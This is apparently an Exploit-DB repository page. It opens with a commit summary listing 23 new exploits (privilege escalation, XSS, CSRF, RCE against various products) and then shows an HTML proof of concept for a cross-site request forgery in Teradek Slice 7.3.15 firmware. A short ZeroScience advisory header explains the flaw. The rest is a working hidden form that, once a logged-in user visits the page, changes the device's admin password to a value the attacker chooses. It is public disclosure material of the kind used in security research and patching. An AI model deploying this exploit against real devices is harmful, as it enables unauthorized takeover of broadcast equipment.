08c35595ed
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
48 lines
No EOL
1.4 KiB
HTML
48 lines
No EOL
1.4 KiB
HTML
<!--
|
|
|
|
Teradek Slice 7.3.15 CSRF Change Password Exploit
|
|
|
|
|
|
Vendor: Teradek, LLC
|
|
Product web page: https://www.teradek.com
|
|
Affected version: Firmware Version: 7.3.15 (build 31735)
|
|
Hardware Version: 2.1
|
|
|
|
|
|
Summary: Built on the award-winning Cube platform, Slice is a rack mount
|
|
HEVC / H.264 codec designed to fit seamlessly into your broadcast studio.
|
|
Like the Cube, Slice encoders and decoders includes 3G-SDI and HDMI I/O,
|
|
Ethernet and WiFi connectivity, and full duplex IFB.
|
|
|
|
Desc: The application interface allows users to perform certain actions
|
|
via HTTP requests without performing any validity checks to verify the
|
|
requests. This can be exploited to perform certain actions with administrative
|
|
privileges if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: lighttpd/1.4.48
|
|
lighttpd/1.4.31
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2018-5467
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php
|
|
|
|
|
|
02.03.2018
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
|
|
<input type="hidden" name="pw1" value="P@ssw0rd" />
|
|
<input type="hidden" name="pw2" value="P@ssw0rd" />
|
|
<input type="hidden" name="user" value="admin" />
|
|
<input type="submit" value="Initiate" />
|
|
</form>
|
|
</body>
|
|
</html> |